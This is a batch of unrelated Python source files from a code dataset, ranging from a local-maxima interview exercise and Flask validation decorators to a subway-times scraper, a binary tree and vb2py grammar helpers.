+{"seq_id":"127678880","text":"# Google STEP imitiation interview quesion.\n\n# Worked on June 22nd 2018.\n\n# Q1. Given an array of integers, you need to find the local maxima.\n#\n# Example : [1 3 5 4 7 10 6]\n#\n# Output : 5 or 10\n#\n# Explanation : Any of the local maxima can be the output.\n# Here 5 is greater than 3 and 4, 10 is greater than 7 and 6.\n\n\n## INPUT ##\n# 1: Random numbers\n# 2: Long as possible\n# 3: (-inf, inf)\n\n## Output ##\n# 1: Multiple local maxima (example: a or b or c).\n\n## Cases ##\n# 1: All same numbers\n# 2: Just increasing\n# 3: Just decreasing\n# 4: Only one coordinate point (example: length of the list is 1).\n\n\n## Time Complexity ##\n# O(n)\n\n\n## Not solved ##\n# Check if the local maxima values are all different.\n# If there is two 3 local maxima in the array, only return one.\n\n\narr = [1, 2, 3, 2, 1, 3, 2, 1]\n\ndef localMaxima(arr):\n peaks = [] # Store the local maxima values\n all_same = True # Check if all the values are same or not.\n dir = False # Change dir. Increasing -> True. Decreasing -> False.\n\n\n for index in range(0, len(arr)-1, 1):\n if arr[index + 1] > arr[index]:\n dir = True\n all_same = False\n else:\n if arr[index + 1] != arr[index]:\n if dir:\n dir = False\n peaks.insert(0, arr[index])\n\n if all_same:\n return arr[0]\n else:\n result = \"\"\n for x in peaks:\n if result == \"\":\n result = result + str(x)\n else:\n result = result + \" or \" + str(x)\n\n return result\n\nlocalMaxima(arr)\n\n\n\nprint(localMaxima(arr))\n","sub_path":"prac_2.py","file_name":"prac_2.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"459062814","text":"from functools import wraps\nfrom json import JSONDecodeError\n\nfrom flask import request\nfrom schema import Schema, SchemaError\nfrom werkzeug.exceptions import BadRequest, Forbidden\n\nfrom pysite.base_route import APIView, RouteView\nfrom pysite.constants import BOT_API_KEY, CSRF, DEBUG_MODE, ErrorCodes, ValidationTypes\n\n\ndef csrf(f):\n \"\"\"\n Apply CSRF protection to a specific view function.\n \"\"\"\n\n @wraps(f)\n def inner_decorator(*args, **kwargs):\n CSRF.protect()\n\n return f(*args, **kwargs)\n\n return inner_decorator\n\n\ndef require_roles(*roles: int):\n def inner_decorator(f):\n\n @wraps(f)\n def inner(self: RouteView, *args, **kwargs):\n data = self.user_data\n\n if DEBUG_MODE:\n return f(self, *args, **kwargs)\n elif data:\n for role in roles:\n if role in data.get(\"roles\", []):\n return f(self, *args, **kwargs)\n\n if isinstance(self, APIView):\n return self.error(ErrorCodes.unauthorized)\n\n raise Forbidden()\n return self.redirect_login(**kwargs)\n\n return inner\n\n return inner_decorator\n\n\ndef api_key(f):\n \"\"\"\n Decorator to check if X-API-Key is valid.\n\n Should only be applied to functions on APIView routes.\n \"\"\"\n\n @wraps(f)\n def inner_decorator(self: APIView, *args, **kwargs):\n if not request.headers.get(\"X-API-Key\") == BOT_API_KEY:\n return self.error(ErrorCodes.invalid_api_key)\n return f(self, *args, **kwargs)\n\n return inner_decorator\n\n\ndef api_params(\n schema: Schema = None,\n validation_type: ValidationTypes = ValidationTypes.json,\n allow_duplicate_params: bool = False):\n \"\"\"\n Validate parameters of data passed to the decorated view.\n\n Should only be applied to functions on APIView routes.\n\n This will pass the validated data in as the first parameter to the decorated function.\n This data will always be a list, and view functions are expected to be able to handle that\n in the case of multiple sets of data being provided by the api.\n\n If `allow_duplicate_params` is set to False (only effects dictionary schemata\n and parameter validation), then the view will return a 400 Bad Request\n response if the client submits multiple parameters with the same name.\n \"\"\"\n\n def inner_decorator(f):\n\n @wraps(f)\n def inner(self: APIView, *args, **kwargs):\n if validation_type == ValidationTypes.json:\n try:\n if not request.is_json:\n return self.error(ErrorCodes.bad_data_format)\n\n data = request.get_json()\n\n if not isinstance(data, list) and isinstance(schema._schema, list):\n data = [data]\n\n except JSONDecodeError:\n return self.error(ErrorCodes.bad_data_format) # pragma: no cover\n\n elif validation_type == ValidationTypes.params and isinstance(schema._schema, list):\n # I really don't like this section here, but I can't think of a better way to do it\n multi = request.args # This is a MultiDict, which should be flattened to a list of dicts\n\n # We'll assume that there's always an equal number of values for each param\n # Anything else doesn't really make sense anyway\n data = []\n longest = None\n\n for _key, items in multi.lists():\n # Make sure every key has the same number of values\n if longest is None:\n # First iteration, store it\n longest = len(items)\n\n elif len(items) != longest: # pragma: no cover\n # At least one key has a different number of values\n return self.error(ErrorCodes.bad_data_format) # pragma: no cover\n\n if longest is not None:\n for i in range(longest): # Now we know all keys have the same number of values...\n obj = {} # New dict to store this set of values\n\n for key, items in multi.lists():\n obj[key] = items[i] # Store the item at that specific index\n\n data.append(obj)\n\n elif validation_type == ValidationTypes.params and isinstance(schema._schema, dict):\n if not allow_duplicate_params:\n for _arg, value in request.args.to_dict(flat=False).items():\n if len(value) > 1:\n raise BadRequest(\"This view does not allow duplicate query arguments\")\n data = request.args.to_dict()\n elif validation_type == ValidationTypes.none:\n return f(self, None, *args, **kwargs)\n\n else:\n raise ValueError(f\"Unknown validation type: {validation_type}\") # pragma: no cover\n\n try:\n schema.validate(data)\n except SchemaError as e:\n return self.error(ErrorCodes.incorrect_parameters, str(e))\n\n return f(self, data, *args, **kwargs)\n\n return inner\n\n return inner_decorator\n","sub_path":"pysite/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"652130953","text":"import cv2\nimport sys,os\nsys.path.append(os.pardir)\nfrom common.module_image import *\n\ndef main():\n\n path = \"../../Data/Lane_Detection_Images/\"\n roadImage_01 = \"solidWhiteCurve.jpg\"\n roadImage_02 = \"solidWhiteRight.jpg\"\n roadImage_03 = \"solidYellowCurve.jpg\"\n roadImage_04 = \"solidYellowCurve2.jpg\"\n roadImage_05 = \"solidYellowLeft.jpg\"\n roadImage_06 = \"whiteCarLaneSwitch.jpg\"\n\n openPath = path+roadImage_01\n\n roadColor = imageRead(openPath, cv2.IMREAD_COLOR) \n roadGray = imageRead(openPath, cv2.IMREAD_GRAYSCALE)\n roadOrigin = imageRead(openPath) # default\n imageWrite(path+\"roadGray.jpg\", roadGray)\n\n imageShow(\"roadColor, cv2.WINDOW_NORMAL\", roadColor, cv2.WINDOW_NORMAL)\n imageShow(\"roadColor, cv2.WINDOW_AUTOSIZE\", roadColor, cv2.WINDOW_AUTOSIZE)\n imageShow(\"roadColor, cv2.WINDOW_FREERATIO\", roadColor, cv2.WINDOW_FREERATIO)\n imageShow(\"roadColor, cv2.WINDOW_GUI_NORMAL\", roadColor, cv2.WINDOW_GUI_NORMAL)\n imageShow(\"roadColor, cv2.WINDOW_GUI_EXPANDED\", roadColor, cv2.WINDOW_GUI_EXPANDED)\n\n imageShow(\"roadGray, cv2.WINDOW_NORMAL\", roadGray, cv2.WINDOW_NORMAL)\n imageShow(\"roadGray, cv2.WINDOW_AUTOSIZE\", roadGray, cv2.WINDOW_AUTOSIZE)\n imageShow(\"roadGray, cv2.WINDOW_FREERATIO\", roadGray, cv2.WINDOW_FREERATIO)\n imageShow(\"roadGray, cv2.WINDOW_GUI_NORMAL\", roadGray, cv2.WINDOW_GUI_NORMAL)\n imageShow(\"roadGray, cv2.WINDOW_GUI_EXPANDED\", roadGray, cv2.WINDOW_GUI_EXPANDED)\n\n imageShow(\"roadOrigin, cv2.WINDOW_NORMAL\", roadOrigin, cv2.WINDOW_NORMAL)\n imageShow(\"roadOrigin, cv2.WINDOW_AUTOSIZE\", roadOrigin, cv2.WINDOW_AUTOSIZE)\n imageShow(\"roadOrigin, cv2.WINDOW_FREERATIO\", roadOrigin, cv2.WINDOW_FREERATIO)\n imageShow(\"roadOrigin, cv2.WINDOW_GUI_NORMAL\", roadOrigin, cv2.WINDOW_GUI_NORMAL)\n imageShow(\"roadOrigin, cv2.WINDOW_GUI_EXPANDED\", roadOrigin, cv2.WINDOW_GUI_EXPANDED)\n\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main()","sub_path":"Python (copy)/1st_02H/01_Image_Read,Show,Write.py","file_name":"01_Image_Read,Show,Write.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"534512288","text":"from xml.etree import ElementTree\nfrom peewee import *\n\ndb = SqliteDatabase('payments.db')\n\n\nclass PaymentsDB(Model):\n class Meta:\n database = db\n db_table = \"payments\"\n\n user_name = CharField()\n payment_amount = DoubleField()\n payment_currency = CharField()\n payment_date = DateTimeField()\n\n def __str__(self):\n return f\"{self.user_name} \" \\\n f\"- {self.payment_amount} \" \\\n f\"- {self.payment_currency} \" \\\n f\"- {self.payment_date} \"\n\n @staticmethod\n def existing_queries(user_name, payment_date):\n existing = PaymentsDB.select().where(\n PaymentsDB.user_name == user_name,\n PaymentsDB.payment_date == payment_date\n )\n return existing\n\n @staticmethod\n def existing_queries0(**kwds):\n e0 = PaymentsDB.select()\n if not kwds:\n return e0\n for key, value in kwds.items():\n E0 = e0.where(getattr(PaymentsDB, key) == value)\n return E0\n\n\n\n# PaymentsDB.drop_table()\n\n\nclass ParsingXMLFile:\n\n @staticmethod\n def parse_file(file, seeking):\n tree = ElementTree.parse(file)\n root = tree.getroot()\n xmlpayments = root.findall(seeking)\n return xmlpayments\n\n\ndef main():\n\n PaymentsDB.create_table()\n\n path = 'paymnets.xml'\n keyword = 'payment'\n\n # парсинг данных\n parsed = ParsingXMLFile.parse_file(path, keyword)\n\n # создание БД\n for each in parsed:\n existing = PaymentsDB.existing_queries0(\n user_name=each.find('name').text,\n payment_date=each.get('date')\n )\n if existing.exists():\n continue\n else:\n PaymentsDB.create(user_name=each.find('name').text,\n payment_amount=each.find('amount').text,\n payment_currency=each.find('currency').text,\n payment_date=each.get('date')\n )\n\n pmts = PaymentsDB.select()\n for p in pmts:\n print(p)\n\n db.close()\n\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"payments/payments_xml.py","file_name":"payments_xml.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"7214946","text":"#built-in exception\r\na,b=5,0\r\ntry:\r\n print(\"Check for errors\")\r\n print(\"The result is\",a/b) \r\nexcept ZeroDivisionError as e:\r\n print(\"number cannot be divided by 0\",e)\r\nfinally:\r\n print(\"Executed successfully\")\r\n\r\n#user defined exception\r\nclass Error(Exception):\r\n pass\r\nclass TooLargeError(Error):\r\n def __init__(self,mesg):\r\n self.mesg=print(\"It is a large number than expected number\")\r\nclass TooSmallError(Error):\r\n def __init__(self,msg):\r\n self.msg=print(\"It is a small number than expected number\")\r\nnum=10\r\nwhile True:\r\n try:\r\n check=int(input(\"Enter a number\"))\r\n if check<10:\r\n raise TooSmallError(check)\r\n elif check>10:\r\n raise TooLargeError(check)\r\n except TooSmallError as se:\r\n print(\"You Entered a small number\",se)\r\n except TooLargeError as le:\r\n print(\"You Entered a large number\",le)\r\n else:\r\n print(\"You Entered correct number\")\r\n finally:\r\n print(\"The number checked successfully\")\r\n","sub_path":"08-Jul-2021/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"564007578","text":"#!pip install faker\nimport pandas as pd\nimport sqlite3\nimport numpy as np\nfrom itertools import repeat\nfrom faker import Faker\nfrom sklearn.utils import shuffle\n#Generating Data\ndef get_data(n,j):\n #Getting fake names\n fake = Faker()\n name_df = [fake.name() for i in range(n)]\n name_df = pd.DataFrame((name_df),columns=['name'])\n\n #Dataframe with Vectors for respective posts and post\n data = pd.read_csv (r'app/business_logic/csv/table3_vectors_for_posts.csv') \n orig_post_df = pd.DataFrame(data, columns= ['pi1','pi2','pi3','pi4','pi5','pi6','pi7','pi8','pi9','pi10','post'])\n post_df = orig_post_df.iloc[:,:]\n #print(df3)\n\n #Dataframe with Vectors for respective cities and city\n data = pd.read_csv (r'app/business_logic/csv/table4_vectors_for_cities.csv')\n orig_city_df = pd.DataFrame(data, columns= ['ci1','ci2','ci3','ci4','ci5','ci6','ci7','ci8','ci9','ci10','city'])\n city_df = orig_city_df.iloc[:,:]\n #print(df4)\n\n #Shuffling and storing the data n times\n new_city_df = city_df\n new_post_df = post_df\n\n for i in range(int(n/7)):\n city_df = shuffle(city_df)\n post_df = shuffle(post_df)\n new_city_df = pd.concat([new_city_df, city_df], axis=0)\n new_post_df = pd.concat([new_post_df, post_df], axis=0)\n\n #Getting n number of data\n normal_city_df = new_city_df.iloc[:,10]\n normal_post_df = new_post_df.iloc[:,10]\n n_city_df = new_city_df.iloc[:,:-1]\n n_post_df = new_post_df.iloc[:,:-1]\n\n n_city_df= new_city_df.head(n)\n n_post_df= new_post_df.head(n)\n normal_city_df= normal_city_df.head(n)\n normal_post_df= normal_post_df.head(n)\n\n #Resetting index\n n_city_df.reset_index(drop=True, inplace=True)\n n_post_df.reset_index(drop=True, inplace=True)\n normal_city_df.reset_index(drop=True, inplace=True)\n normal_post_df.reset_index(drop=True, inplace=True)\n\n #Dataframe ready for table 1 with name, post and city word embeddings\n df1 = pd.concat([name_df,n_post_df,n_city_df], axis=1)\n normal_df1 = pd.concat([name_df,normal_post_df,normal_city_df], axis=1)\n #print(df1)\n\n #Shuffling and resetting index for table 2 \n new_city_df = shuffle(new_city_df)\n new_post_df = shuffle(new_post_df)\n\n normal2_city_df = new_city_df.iloc[:,10]\n normal2_post_df = new_post_df.iloc[:,10]\n new_city_df = new_city_df.iloc[:,:-1]\n new_post_df = new_post_df.iloc[:,:-1]\n\n new_city_df= new_city_df.head(j)\n new_post_df= new_post_df.head(j)\n normal2_city_df= normal_city_df.head(j)\n normal2_post_df= normal_post_df.head(j)\n\n new_city_df.reset_index(drop=True, inplace=True)\n new_post_df.reset_index(drop=True, inplace=True)\n\n #Dataframe ready for table 2 with post and city\n df2 = pd.concat([new_post_df,new_city_df], axis=1)\n normal_df2 = pd.concat([normal2_post_df,normal2_city_df], axis=1)\n #print(df2)\n\n #Creating database\n connection = sqlite3.connect(\"position_city_database_with_embeddings.db\", check_same_thread=False)\n crsr = connection.cursor() \n\n #Comment the table creation and insertion of data into the table if the database is already created once.\n #Creating table1 with name, embeddings of post, and embeddings of city\n crsr.execute('CREATE TABLE name_post_city (NAME nvarchar(50),pi1 float,pi2 float,pi3 float,pi4 float,pi5 float,pi6 float,pi7 float,pi8 float,pi9 float,pi10 float, ci1 float,ci2 float,ci3 float,ci4 float,ci5 float,ci6 float,ci7 float,ci8 float,ci9 float,ci10 float, FOREIGN KEY (ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10) REFERENCES em_city_name(ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10), FOREIGN KEY (pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10) REFERENCES em_post_city(pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10))')\n df1.to_sql('name_post_city', connection, if_exists='replace', index = False)\n crsr.execute('''SELECT * FROM name_post_city''')\n # print(\"Table 1: Name_Post_City Data\")\n # for row in crsr.fetchall():\n # print (row)\n\n #Creating normal table1 with name,post, and city\n crsr.execute('CREATE TABLE normal_name_post_city (NAME nvarchar(50),pi1 float,pi2 float,pi3 float,pi4 float,pi5 float,pi6 float,pi7 float,pi8 float,pi9 float,pi10 float, ci1 float,ci2 float,ci3 float,ci4 float,ci5 float,ci6 float,ci7 float,ci8 float,ci9 float,ci10 float, FOREIGN KEY (ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10) REFERENCES em_city_name(ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10), FOREIGN KEY (pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10) REFERENCES em_post_city(pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10))')\n normal_df1.to_sql('normal_name_post_city', connection, if_exists='replace', index = False)\n crsr.execute('''SELECT * FROM normal_name_post_city''')\n # print(\"Normal Table 1: Normal_Name_Post_City Data\")\n # for row in crsr.fetchall():\n # print (row)\n\n #Creating table2 with embeddings of post and embeddings of city\n crsr.execute('CREATE TABLE post_city (pi1 float,pi2 float,pi3 float,pi4 float,pi5 float,pi6 float,pi7 float,pi8 float,pi9 float,pi10 float, ci1 float,ci2 float,ci3 float,ci4 float,ci5 float,ci6 float,ci7 float,ci8 float,ci9 float,ci10 float, FOREIGN KEY (ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10) REFERENCES em_city_name(ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10), FOREIGN KEY (pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10) REFERENCES em_post_city(pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10))')\n df2.to_sql('post_city', connection, if_exists='replace', index = False)\n # print(\"\\nTable 2: Post_City Data\")\n # crsr.execute('''SELECT * FROM post_city''')\n # for row in crsr.fetchall():\n # print (row)\n \n\n #Creating normal table2 with post and city\n crsr.execute('CREATE TABLE normal_post_city (pi1 float,pi2 float,pi3 float,pi4 float,pi5 float,pi6 float,pi7 float,pi8 float,pi9 float,pi10 float, ci1 float,ci2 float,ci3 float,ci4 float,ci5 float,ci6 float,ci7 float,ci8 float,ci9 float,ci10 float, FOREIGN KEY (ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10) REFERENCES em_city_name(ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10), FOREIGN KEY (pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10) REFERENCES em_post_city(pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10))')\n normal_df2.to_sql('normal_post_city', connection, if_exists='replace', index = False)\n # print(\"\\nNormal Table 2: Normal_Post_City Data\")\n # crsr.execute('''SELECT * FROM normal_post_city''')\n # for row in crsr.fetchall():\n # print (row)\n\n #Creating table3 with embeddings of post and name of posts\n crsr.execute('CREATE TABLE em_post_name (pi1 float,pi2 float,pi3 float,pi4 float,pi5 float,pi6 float,pi7 float,pi8 float,pi9 float,pi10 float, post nvarchar(50), PRIMARY KEY(pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10))')\n orig_post_df.to_sql('em_post_name', connection, if_exists='replace', index = False)\n # print(\"\\nTable 3: Em_Post_Name Data\")\n # crsr.execute('''SELECT * FROM em_post_name''')\n # for row in crsr.fetchall():\n # print (row)\n\n #Creating table4 with embeddings of city and name of cities\n crsr.execute('CREATE TABLE em_city_name (ci1 float,ci2 float,ci3 float,ci4 float,ci5 float,ci6 float,ci7 float,ci8 float,ci9 float,ci10 float, city nvarchar(50), PRIMARY KEY(ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10))')\n orig_city_df.to_sql('em_city_name', connection, if_exists='replace', index = False)\n # print(\"\\nTable 4: Em_City_Name Data\")\n # crsr.execute('''SELECT * FROM em_city_name''')\n # for row in crsr.fetchall():\n # print (row)\n\n connection.commit()\n\n #Execute the following line to print all the SQL queries when executed\n #connection.set_trace_callback(print)\n\n #Incase you want to drop all tables:\n #crsr.execute('DROP TABLE name_post_city')\n #crsr.execute('DROP TABLE post_city')\n #crsr.execute('DROP TABLE em_post_name')\n #crsr.execute('DROP TABLE em_city_name')\n #connection.commit() \n\n#get_data(10000,5000)","sub_path":"source/app/business_logic/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"414718453","text":"\"\"\"Basic tasks\"\"\"\n\nimport logging\n\nfrom celery import task\nfrom django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import get_template\n\n\nlog = logging.getLogger(__name__)\n\n\n@task(queue='web')\ndef send_email_task(recipient, subject, template, template_html, context=None):\n \"\"\"Send multipart email\n\n recipient\n Email recipient address\n\n subject\n Email subject header\n\n template\n Plain text template to send\n\n template_html\n HTML template to send as new message part\n\n context\n A dictionary to pass into the template calls\n \"\"\"\n msg = EmailMultiAlternatives(\n subject,\n get_template(template).render(context),\n settings.DEFAULT_FROM_EMAIL,\n [recipient]\n )\n msg.attach_alternative(get_template(template_html).render(context),\n 'text/html')\n msg.send()\n log.info('Sent email to recipient: %s', recipient)\n","sub_path":"readthedocs/core/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"349664322","text":"from environnement import Environment\nfrom ia import Agent\n\n\ndef objectif_atteint (e):\n if e.get_lastTemp() < e.get_tVoulue() <= e.get_tInt():\n return True\n if e.get_lastTemp() < e.get_tVoulue() <= e.get_tInt():\n return True\n else:\n return False\n\n\ndef world (agent, environment, outcome):\n # AJOUTER LE CONTEXTE A LA CREATION DE L'AGENT\n\n count = 0\n # if e.changeTvoulue == True :\n # print(\"change\")\n # _contexte = [environment.get_tInt(),environment.get_tVoulue(),environment.get_tExt()]\n # agent.addcontexte(_contexte)\n agent.update_contexte()\n agent.search_best_action() #\n action = agent.action(outcome)\n\n if objectif_atteint(environment):\n action = 2\n print(\"Action choisie : \" + str(action))\n outcome = environment.outcome(action)\n # print(\" TEMP \"+str(environment.get_tInt()) +\" (\"+ str(environment.get_lastdiff() - environment.get_diff())+\")\" )\n agent.save_best_actions(action, outcome)\n\n # new_temp = input('Entrer la nouvelle temperature2:')\n # environment.set_tVoulue(int(new_temp))\n\n action_outcome = [action, outcome]\n\n return action_outcome\n\n print(\"Nombres d'actions pour finir : \" + str(count))\n\n\ne = Environment(19, 21, 18, [1, 2])\nhedonist_table2 = [[2, -2, -2], [2, -2, -2], [3, -1, 4]]\nprint(\"hedo :\" + str(hedonist_table2[2][2]))\n_contexte = [e.get_tInt(), e.get_tVoulue(), e.get_tExt()]\na = Agent(hedonist_table2, 4, e)\n# a.addcontexte(_contexte)\naction_outcome = [0, 0]\n\nx = 'n'\n\nwhile (x == 'n'):\n x = input('Quitter ?')\n print(\"T interieur : \" + str(e.get_tInt()) + \" T voulue : \" + str(e.get_tVoulue()) + \" T exterieur : \" + str(\n e.get_tExt()))\n action_outcome = world(a, e, action_outcome[1])\n print(\"L'action a effectuer : \" + str(action_outcome))\n print(\"T interieur : \" + str(e.get_tInt()) + \" T voulue : \" + str(e.get_tVoulue()) + \" T exterieur : \" + str(\n e.get_tExt()))\n","sub_path":"ia/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"389096454","text":"class Nodo:\n def __init__(self, valor):\n self.hijoIzq = None\n self.hijoDer = None\n self.val = valor\n\n\nclass Arbol:\n def __init__(self):\n self.raiz = None\n\n def obtenerRaiz(self):\n return self.raiz\n\n def agregar(self, val):\n if(self.raiz == None):\n self.raiz = Nodo(val)\n else:\n self.agregarNodo(val, self.raiz)\n\n def agregarNodo(self, val, nodo):\n if(val < nodo.val):\n if(nodo.hijoIzq != None):\n self.agregarNodo(val, nodo.hijoIzq)\n else:\n nodo.hijoIzq = Nodo(val)\n else:\n if(nodo.hijoDer != None):\n self.agregarNodo(val, nodo.hijoDer)\n else:\n nodo.hijoDer = Nodo(val)\n\n def preorden(self, nodo):\n if(nodo != None):\n print(str(nodo.val))\n if nodo.hijoIzq != None:\n self.preorden(nodo.hijoIzq)\n if nodo.hijoDer != None:\n self.preorden(nodo.hijoDer)\n\n def imprimePreorden(self):\n if(self.raiz != None):\n self.preorden(self.raiz)\n\n def busqueda(self, nodo, valor):\n if(nodo.val == valor):\n return True\n if valor < nodo.val:\n return self.busqueda(nodo.hijoIzq, valor)\n else:\n return self.busqueda(nodo.hijoDer, valor)\n return False\n\n\nclass Controladora:\n def main(self):\n print(\"Grafo\")\n arbol = Arbol()\n arbol.agregar(8)\n arbol.agregar(3)\n arbol.agregar(10)\n arbol.agregar(1)\n arbol.agregar(6)\n arbol.agregar(14)\n arbol.agregar(4)\n arbol.agregar(7)\n arbol.agregar(13)\n arbol.imprimePreorden()\n print(\"Resultado de búsqueda\")\n print(arbol.busqueda(arbol.raiz, 13))\n\n\nobj = Controladora()\nobj.main()","sub_path":"Arboles.py","file_name":"Arboles.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"522960031","text":"#!/usr/bin/env python\nfrom samplebase import SampleBase\nfrom rgbmatrix import graphics\nimport time\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport json\ntwothreeURL = 'http://traintimelb-367443097.us-east-1.elb.amazonaws.com/getTime/2/232?callback=angular.callbacks._0'\nfourfiveURL = 'http://traintimelb-367443097.us-east-1.elb.amazonaws.com/getTime/4/423?callback=angular.callbacks._0'\n\n\ndef Jsonify(trainURL):\n r = requests.get(trainURL)\n soup = BeautifulSoup(r.text,'html.parser')\n #json1 since need to call an actual json funtion later on\n json1 = soup.text\n json1 = json1.split('(')\n json1 = json1[1].split(')')\n json1 = json1[0]\n global jsonDict\n jsonDict = json.loads(json1)\n\ndef Info():\n updateTime = jsonDict[\"lastUpdatedTime\"]\n station = jsonDict[\"stationName\"]\n print(station, updateTime)\n print('----------')\n # print(updateTime)\n # print('----------')\n\ndef Uptown():\n uptowntext = \"\"\n manhattan = jsonDict[\"direction1\"][\"times\"][0:2]\n for i in range(0,2):\n # NextTrainsManhattan = (\"There is a\", manhattan[i][\"route\"], \"train to\", manhattan[i][\"lastStation\"],\":\", manhattan[i][\"minutes\"], \"minutes away\")\n uptowntext += str(manhattan[i][\"route\"])\n uptowntext += \":\"\n uptowntext += str(manhattan[i][\"minutes\"])\n uptowntext += \"min\"\n return uptowntext\n\ndef Downtown():\n downtowntext = \"\"\n brooklyn = jsonDict[\"direction2\"][\"times\"][0:2]\n for j in range(0,2):\n # NextTrainsBrooklyn = (\"There is a\", brooklyn[j][\"route\"], \"train to\", brooklyn[j][\"lastStation\"],\":\", brooklyn[j][\"minutes\"], \"minutes away\")\n downtowntext += str(brooklyn[j][\"route\"])\n downtowntext += \":\"\n downtowntext += str(brooklyn[j][\"minutes\"])\n downtowntext += \"min\"\n return downtowntext\n\n# def AllUptown():\n# totaluptowntext = \"\"\n# Jsonify(twothreeURL)\n# Info()\n# totaluptowntext += Uptown()\n# Jsonify(fourfiveURL)\n# totaluptowntext += Uptown()\n# # print(totaluptowntext)\n# return totaluptowntext\ndef Uptown45():\n text = \"Up\"\n Jsonify(fourfiveURL)\n text += Uptown()\n return text\ndef Downtown45():\n text = \"Down\"\n Jsonify(fourfiveURL)\n text += Downtown()\n return text\ndef Uptown23():\n text = \"Up\"\n Jsonify(twothreeURL)\n text += Uptown()\n return text\ndef Downtown23():\n text = \"Down\"\n Jsonify(twothreeURL)\n text += Downtown()\n return text\n# def AllDowntown():\n# totaldowntowntext = \"\" \n# Jsonify(twothreeURL)\n# totaldowntowntext += Downtown()\n# Jsonify(fourfiveURL)\n# totaldowntowntext += Downtown()\n# # print(totaldowntowntext)\n# return totaldowntowntext\n\nsubwaytimeslist = []\nprint(subwaytimeslist)\ndef runall():\n subwaytimeslist.append(Uptown23())\n subwaytimeslist.append(Uptown45())\n subwaytimeslist.append(Downtown23())\n subwaytimeslist.append(Downtown45())\n\nrunall()\nprint(subwaytimeslist)\n\n\n\n","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"24700749","text":"from models import Task\n\n\ndef init_db():\n task_list = Task.query().fetch(20)\n if len(task_list) <= 0:\n for i in range(20):\n t = Task()\n t.description = \"Task #\" + str(i)\n t.put()\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"624527742","text":"import os\nimport re\nimport mako.template\nimport mako.lookup\n\n\nclass TextColours:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\nBASE_GRAMMAR_SETTINGS = {\n 'dialect': 'VB6',\n 'mode': 'rigorous',\n}\n\n\ndef rootPath():\n \"\"\"Return the root path\"\"\"\n return os.path.split(os.path.abspath(__file__))[0]\n\n\ndef relativePath(*paths):\n \"\"\"Return the path to a file\"\"\"\n return os.path.join(rootPath(), *paths)\n\n\ndef loadGrammarFrom(filename, data=None):\n \"\"\"Return the text of a grammar file loaded from the disk\"\"\"\n with open(filename, 'r') as f:\n text = f.read()\n lookup = mako.lookup.TemplateLookup(directories=[relativePath('grammars')])\n template = mako.template.Template(text, lookup=lookup)\n #\n base_data = {}\n base_data.update(BASE_GRAMMAR_SETTINGS)\n #\n if data:\n for k, v in data.items():\n if v is not None:\n base_data[k] = v\n #\n return str(template.render(**base_data))\n\n\ndef countNewlines(text):\n \"\"\"Return the number of newlines in some text\"\"\"\n return len(re.findall('\\n', text))\n","sub_path":"vb2py/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
